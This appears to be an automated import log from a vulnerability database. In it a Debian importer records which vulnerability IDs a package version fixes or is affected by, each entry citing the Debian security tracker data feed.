2026-04-11T17:50:14.800599+00:00 Debian Importer Fixing VCID-pjm4-2g47-4qau https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T17:50:00.598731+00:00 Debian Importer Fixing VCID-kq6x-z56m-wqhh https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T17:49:59.728027+00:00 Debian Importer Fixing VCID-4nsq-h8ab-5kcj https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T17:49:48.106992+00:00 Debian Importer Fixing VCID-w278-q56x-j7fw https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T17:49:42.418142+00:00 Debian Importer Fixing VCID-x7g7-5k9x-gbay https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T17:49:39.685670+00:00 Debian Importer Fixing VCID-sj8x-sdpv-rkfy https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T17:49:26.449847+00:00 Debian Importer Fixing VCID-2t4v-16se-7qef https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T17:49:25.499662+00:00 Debian Importer Fixing VCID-3eje-68bz-k7ej https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T17:49:24.936197+00:00 Debian Importer Fixing VCID-tw4r-9r9b-4qez https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T17:49:17.391006+00:00 Debian Importer Fixing VCID-ap1a-jz5x-ybfv https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T17:49:16.248373+00:00 Debian Importer Fixing VCID-dt8r-gjff-pqe4 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T17:49:05.812441+00:00 Debian Importer Fixing VCID-ru3u-g5g8-zbcn https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T17:49:03.541116+00:00 Debian Importer Fixing VCID-hcxd-bker-sqc1 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T17:48:58.689239+00:00 Debian Importer Fixing VCID-7dqc-1d5h-uybs https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T17:48:56.071640+00:00 Debian Importer Fixing VCID-9ark-hra3-zyh9 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T17:48:56.038643+00:00 Debian Importer Fixing VCID-wbx1-wdxc-k3bc https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T17:48:42.175721+00:00 Debian Importer Fixing VCID-9pr7-aw96-cqfb https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T17:48:37.193372+00:00 Debian Importer Fixing VCID-qxe7-vuy5-9ycg https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T17:48:34.877900+00:00 Debian Importer Fixing VCID-k1pr-h6c7-2fgp https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T17:48:24.814763+00:00 Debian Importer Fixing VCID-zp6q-98qj-ykh1 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-11T17:48:04.038497+00:00 Debian Importer Fixing VCID-5a4x-wwha-pufn https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-03T07:27:28.335512+00:00 Debian Importer Affected by VCID-tt6z-t31v-dkdd https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:28.303130+00:00 Debian Importer Affected by VCID-zvq4-ybph-buga https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:28.270550+00:00 Debian Importer Affected by VCID-jc5m-7rvc-2qg6 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:28.232943+00:00 Debian Importer Fixing VCID-g679-q851-xub7 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:28.167276+00:00 Debian Importer Fixing VCID-r3vw-ncns-cqgb https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:28.102082+00:00 Debian Importer Fixing VCID-2zje-ag2v-7kac https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:28.036576+00:00 Debian Importer Fixing VCID-g41y-dv8u-3yf1 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:27.977342+00:00 Debian Importer Fixing VCID-dabd-m3mf-3ker https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:27.919276+00:00 Debian Importer Fixing VCID-bw4q-dt1r-y3e4 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:27.861661+00:00 Debian Importer Fixing VCID-rj9n-ra1t-77dy https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:27.797709+00:00 Debian Importer Fixing VCID-n47w-r932-abey https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:27.733234+00:00 Debian Importer Fixing VCID-x8c6-9pse-xkc8 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:27.667475+00:00 Debian Importer Fixing VCID-6h7x-3rue-kucp https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:27.602501+00:00 Debian Importer Fixing VCID-1cpn-zvem-v7gt https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:27.538565+00:00 Debian Importer Fixing VCID-54da-fzyt-4ud2 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:27.471953+00:00 Debian Importer Fixing VCID-sw7g-hxxr-n3e1 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:27.406291+00:00 Debian Importer Fixing VCID-rbdg-vz8x-ykah https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:27.341245+00:00 Debian Importer Fixing VCID-cuhw-ew1g-s3h2 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:27.275576+00:00 Debian Importer Fixing VCID-y58b-be93-hbfd https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:27.211218+00:00 Debian Importer Fixing VCID-rjkf-pdny-2fhn https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:27.152775+00:00 Debian Importer Fixing VCID-zpcy-nms7-kuha https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:27.095759+00:00 Debian Importer Fixing VCID-fnck-7mvx-hqc9 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:27.025074+00:00 Debian Importer Fixing VCID-29r3-kvf4-n3hc https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:26.946947+00:00 Debian Importer Fixing VCID-jcjk-s89c-mbbm https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:26.867350+00:00 Debian Importer Fixing VCID-tv15-dcnu-pbbn https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:26.793383+00:00 Debian Importer Fixing VCID-d8yf-8rff-3yhf https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:26.719526+00:00 Debian Importer Fixing VCID-15ny-qqbj-qyfk https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:26.644280+00:00 Debian Importer Fixing VCID-sd54-b8z1-2fg7 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:26.569639+00:00 Debian Importer Fixing VCID-p5aw-n691-nkff https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:26.498218+00:00 Debian Importer Fixing VCID-f1zu-xb4j-8qhp https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:26.427635+00:00 Debian Importer Fixing VCID-vpdn-g1k9-1kdn https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:26.351137+00:00 Debian Importer Fixing VCID-zab9-9tqj-hbhg https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:26.278389+00:00 Debian Importer Fixing VCID-cbqr-aybx-d3e6 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:26.206700+00:00 Debian Importer Fixing VCID-sdc2-fcap-abaz https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:26.128582+00:00 Debian Importer Fixing VCID-utfe-h3b7-jqcj https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:26.055623+00:00 Debian Importer Fixing VCID-5zkt-kcgx-a3e2 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:25.984083+00:00 Debian Importer Fixing VCID-uvpj-a8v5-ebgz https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:25.919633+00:00 Debian Importer Fixing VCID-y4hn-6bv6-jugw https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:25.847669+00:00 Debian Importer Fixing VCID-bd1g-sfsp-37h7 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:25.783261+00:00 Debian Importer Fixing VCID-5xqd-gf3b-4ygw https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:25.719371+00:00 Debian Importer Fixing VCID-gdg8-aejn-83c4 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:25.648297+00:00 Debian Importer Fixing VCID-emmr-15qp-vfah https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:25.578130+00:00 Debian Importer Fixing VCID-5uyd-bv33-h7g1 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:25.508344+00:00 Debian Importer Fixing VCID-kefv-kpkk-wudf https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:25.437670+00:00 Debian Importer Fixing VCID-pcme-bwan-3bcf https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:25.366542+00:00 Debian Importer Fixing VCID-yx7r-r7ez-7uhp https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:25.296255+00:00 Debian Importer Fixing VCID-z9t9-bxf9-hkfk https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:25.225256+00:00 Debian Importer Fixing VCID-dtza-65ku-aber https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:25.154566+00:00 Debian Importer Fixing VCID-xbsu-ac6g-53fn https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:25.090390+00:00 Debian Importer Fixing VCID-62ar-kwbq-nyh3 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:25.018461+00:00 Debian Importer Fixing VCID-kdw5-8y5z-zya5 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:24.954060+00:00 Debian Importer Fixing VCID-ruf5-255v-sfdb https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:24.882534+00:00 Debian Importer Fixing VCID-jvq6-xjbu-fkb9 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:24.810138+00:00 Debian Importer Fixing VCID-b5pd-kk97-gban https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:24.737550+00:00 Debian Importer Fixing VCID-acsa-1uwk-fqee https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:24.670698+00:00 Debian Importer Fixing VCID-h221-qd8d-tqa5 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:24.594318+00:00 Debian Importer Fixing VCID-nvp5-dpj6-byda https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:24.518357+00:00 Debian Importer Fixing VCID-vaks-d4k5-zue7 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:24.439246+00:00 Debian Importer Fixing VCID-569d-6nue-5kbq https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:24.362760+00:00 Debian Importer Fixing VCID-g9xf-han8-6qgs https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:24.298490+00:00 Debian Importer Fixing VCID-b43n-3d1g-u3fe https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:24.234918+00:00 Debian Importer Fixing VCID-2gw3-qfan-jygd https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:24.179776+00:00 Debian Importer Fixing VCID-7t1t-1spz-gfee https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:24.116541+00:00 Debian Importer Fixing VCID-x8c1-btup-4ygu https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:24.042348+00:00 Debian Importer Fixing VCID-spch-fffg-4yc5 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:23.964116+00:00 Debian Importer Fixing VCID-vkp6-wh22-eqap https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:23.887567+00:00 Debian Importer Fixing VCID-jtkv-nvan-jbag https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:23.810087+00:00 Debian Importer Fixing VCID-mxg1-261s-nbds https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:23.724712+00:00 Debian Importer Fixing VCID-f6pf-5jnz-fkd1 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:23.640231+00:00 Debian Importer Fixing VCID-r889-wzc7-1yem https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:23.556309+00:00 Debian Importer Fixing VCID-uwj5-1fkf-7qg9 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:23.441527+00:00 Debian Importer Affected by VCID-a2qm-vkc3-qkd5 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:23.406785+00:00 Debian Importer Fixing VCID-ef36-52cx-dfg5 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:23.323381+00:00 Debian Importer Fixing VCID-tw4r-9r9b-4qez https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:23.246834+00:00 Debian Importer Fixing VCID-vbdt-31wd-v3h8 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:23.167979+00:00 Debian Importer Fixing VCID-9ewm-6688-kkar https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:23.083816+00:00 Debian Importer Fixing VCID-784p-34mz-vucz https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:23.000362+00:00 Debian Importer Fixing VCID-6t7d-2hre-sqbw https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:22.925142+00:00 Debian Importer Fixing VCID-5s8n-dfjf-ruey https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:22.837435+00:00 Debian Importer Fixing VCID-u45q-eheh-6kak https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:22.771682+00:00 Debian Importer Fixing VCID-e3ne-1hd5-dyfg https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:22.703863+00:00 Debian Importer Fixing VCID-4dpv-a4ns-hye2 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:22.654333+00:00 Debian Importer Fixing VCID-v2r8-1wgn-1bgs https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:22.591090+00:00 Debian Importer Fixing VCID-q37s-1azj-xkhv https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:22.540943+00:00 Debian Importer Fixing VCID-56xz-svu7-eue2 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:22.489427+00:00 Debian Importer Fixing VCID-yah4-bf7d-w7f4 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:22.433347+00:00 Debian Importer Fixing VCID-rghj-fgdd-nke7 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:22.382399+00:00 Debian Importer Fixing VCID-swqu-wape-83bj https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:22.318282+00:00 Debian Importer Fixing VCID-h6hy-g7da-1yg4 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:22.258411+00:00 Debian Importer Fixing VCID-pk4j-w1q9-vqd2 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:22.182380+00:00 Debian Importer Fixing VCID-ujad-kteu-sfdu https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:22.126307+00:00 Debian Importer Fixing VCID-t38m-c4zf-yqe6 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:22.059441+00:00 Debian Importer Fixing VCID-pjm4-2g47-4qau https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:21.985320+00:00 Debian Importer Fixing VCID-6vvv-g1fm-4bdn https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:21.922265+00:00 Debian Importer Fixing VCID-anh4-1hmn-yfh8 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:21.873199+00:00 Debian Importer Fixing VCID-mmw7-4m3z-2kcn https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:21.803920+00:00 Debian Importer Fixing VCID-aqs4-r36j-ffe7 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:21.728153+00:00 Debian Importer Fixing VCID-vrqg-4fke-mfay https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:21.661371+00:00 Debian Importer Fixing VCID-agz5-g8mr-e7hn https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:21.594017+00:00 Debian Importer Fixing VCID-yspe-wj34-juck https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:21.525767+00:00 Debian Importer Fixing VCID-r1uc-e1w7-kyda https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:21.449291+00:00 Debian Importer Fixing VCID-rrvd-vd81-sfdm https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:21.381061+00:00 Debian Importer Fixing VCID-8bac-p2pq-vkf1 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:21.330198+00:00 Debian Importer Fixing VCID-nvea-drm5-h3au https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:21.255300+00:00 Debian Importer Fixing VCID-bky2-hjpj-67ag https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:21.188324+00:00 Debian Importer Fixing VCID-3gtv-1gg5-5fh2 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:21.138496+00:00 Debian Importer Fixing VCID-p4yb-mqca-v7c8 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:21.071744+00:00 Debian Importer Fixing VCID-xtfv-8vvu-qudb https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:21.015257+00:00 Debian Importer Fixing VCID-utsb-dc1p-jkcq https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:20.964916+00:00 Debian Importer Fixing VCID-u9gb-ppd4-3fd5 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:20.895852+00:00 Debian Importer Fixing VCID-my2x-tnvf-wqbw https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:20.816428+00:00 Debian Importer Fixing VCID-pmpn-drv8-9ude https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:20.766759+00:00 Debian Importer Fixing VCID-djqz-f6k5-fqfj https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:20.699424+00:00 Debian Importer Fixing VCID-yub2-x8z7-d3e6 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:20.641906+00:00 Debian Importer Fixing VCID-sy2v-5ufy-sfc4 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:20.584684+00:00 Debian Importer Fixing VCID-eb4u-x1mt-2uan https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:20.525270+00:00 Debian Importer Fixing VCID-4p71-qkjb-97c6 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:20.473381+00:00 Debian Importer Fixing VCID-zp6q-98qj-ykh1 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:20.407291+00:00 Debian Importer Fixing VCID-834e-c7gn-afac https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:20.341511+00:00 Debian Importer Fixing VCID-9h1k-h8gw-hkat https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:20.276050+00:00 Debian Importer Fixing VCID-cmym-m1da-f3fg https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:20.209193+00:00 Debian Importer Fixing VCID-92es-dtbz-tqae https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:20.142688+00:00 Debian Importer Fixing VCID-tm56-q7ka-ukft https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:20.073846+00:00 Debian Importer Fixing VCID-18rv-b2mg-jbex https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:20.024148+00:00 Debian Importer Fixing VCID-hrrw-ufje-akg5 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:19.973959+00:00 Debian Importer Fixing VCID-b8hx-6u4j-b3dc https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:19.915253+00:00 Debian Importer Fixing VCID-psf6-cvdn-h3b1 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:19.865829+00:00 Debian Importer Fixing VCID-bcy4-phg3-w3fq https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:19.816620+00:00 Debian Importer Fixing VCID-4f97-2smu-6qfc https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:19.767305+00:00 Debian Importer Fixing VCID-c8rr-y6zy-h7h5 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:19.717502+00:00 Debian Importer Fixing VCID-mhbe-8x14-f3d6 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:19.668014+00:00 Debian Importer Fixing VCID-gf8v-mmd7-hqag https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:19.617132+00:00 Debian Importer Fixing VCID-mn5y-2hmf-dkgy https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:19.566568+00:00 Debian Importer Fixing VCID-nxfx-jh82-vud3 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:19.516362+00:00 Debian Importer Fixing VCID-vf3u-cgrx-a7d7 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:19.466749+00:00 Debian Importer Fixing VCID-6279-tc7g-g3ag https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:19.416958+00:00 Debian Importer Fixing VCID-p6m5-ntbm-auct https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:19.366907+00:00 Debian Importer Fixing VCID-ptej-pfyn-z3aq https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:19.316569+00:00 Debian Importer Fixing VCID-3zbe-p6ue-ffe8 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:19.266313+00:00 Debian Importer Fixing VCID-453d-2nac-jbdc https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:19.216366+00:00 Debian Importer Fixing VCID-ay8n-59tt-k7cp https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:19.165577+00:00 Debian Importer Fixing VCID-hwcd-dj3f-guay https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:19.115655+00:00 Debian Importer Fixing VCID-6bf2-uh5z-kfg7 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:19.066200+00:00 Debian Importer Fixing VCID-g1ct-6d28-g3ab https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:19.015652+00:00 Debian Importer Fixing VCID-tn11-bwg6-m3e3 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:18.965607+00:00 Debian Importer Fixing VCID-gp36-v664-vuh2 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:18.915704+00:00 Debian Importer Fixing VCID-ucfp-qqy4-jqdm https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:18.865501+00:00 Debian Importer Fixing VCID-2dwv-ndt5-gfg2 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:18.815670+00:00 Debian Importer Fixing VCID-u6vb-tewy-fkda https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:18.766637+00:00 Debian Importer Fixing VCID-uwq6-h2du-dkdn https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:18.716067+00:00 Debian Importer Fixing VCID-t2pe-etah-1bh3 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:18.666897+00:00 Debian Importer Fixing VCID-4s25-p8ea-zkh7 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:18.617094+00:00 Debian Importer Fixing VCID-41xr-8ryd-z3ew https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:18.567168+00:00 Debian Importer Fixing VCID-jpxf-qevp-kycp https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:18.516886+00:00 Debian Importer Fixing VCID-8yfc-gunh-17a2 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:18.454647+00:00 Debian Importer Fixing VCID-6y99-sgwe-tygw https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:18.404343+00:00 Debian Importer Fixing VCID-cure-qgzj-8qfu https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:18.355100+00:00 Debian Importer Fixing VCID-xsue-s6sg-aqff https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:18.304938+00:00 Debian Importer Fixing VCID-7f35-ha1p-bbby https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:18.255246+00:00 Debian Importer Fixing VCID-zv8w-puzj-23cd https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:18.205613+00:00 Debian Importer Fixing VCID-fzhr-jhhc-m3ej https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:18.155619+00:00 Debian Importer Fixing VCID-h7em-v8x6-63e3 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:18.106089+00:00 Debian Importer Fixing VCID-p31j-f9s2-quh9 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:18.056866+00:00 Debian Importer Fixing VCID-2m38-vt4m-5ffa https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:18.007892+00:00 Debian Importer Fixing VCID-wwcs-2mw8-4bbr https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:17.954557+00:00 Debian Importer Fixing VCID-yhmq-s1jh-17bh https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:17.892410+00:00 Debian Importer Fixing VCID-vdum-127b-qfbq https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:17.833061+00:00 Debian Importer Fixing VCID-twq8-ntkg-zbfk https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:17.783068+00:00 Debian Importer Fixing VCID-3qad-mewf-8khz https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:17.733865+00:00 Debian Importer Fixing VCID-x95w-ad3j-n7aj https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:17.684491+00:00 Debian Importer Fixing VCID-n22y-f9az-fubm https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:17.634887+00:00 Debian Importer Fixing VCID-b32k-mwuv-hfeq https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:17.585852+00:00 Debian Importer Fixing VCID-bum5-f5xb-akeg https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:17.536120+00:00 Debian Importer Fixing VCID-ccbh-689z-6kg2 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:17.473822+00:00 Debian Importer Fixing VCID-3bbh-2exn-m7ac https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:17.414049+00:00 Debian Importer Fixing VCID-g1e8-3nnr-gqff https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:17.365603+00:00 Debian Importer Fixing VCID-x9y3-z82n-33d8 https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:17.317108+00:00 Debian Importer Fixing VCID-267c-s4sq-9bfw https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:17.268221+00:00 Debian Importer Fixing VCID-3ju6-ah7s-suhh https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:17.220309+00:00 Debian Importer Fixing VCID-acgu-hc83-yubn https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:17.172329+00:00 Debian Importer Fixing VCID-zh44-pz7k-abba https://security-tracker.debian.org/tracker/data/json 38.1.0
2026-04-03T07:27:17.123827+00:00 Debian Importer Fixing VCID-neaa-39c7-sfbc https://security-tracker.debian.org/tracker/data/json 38.1.0
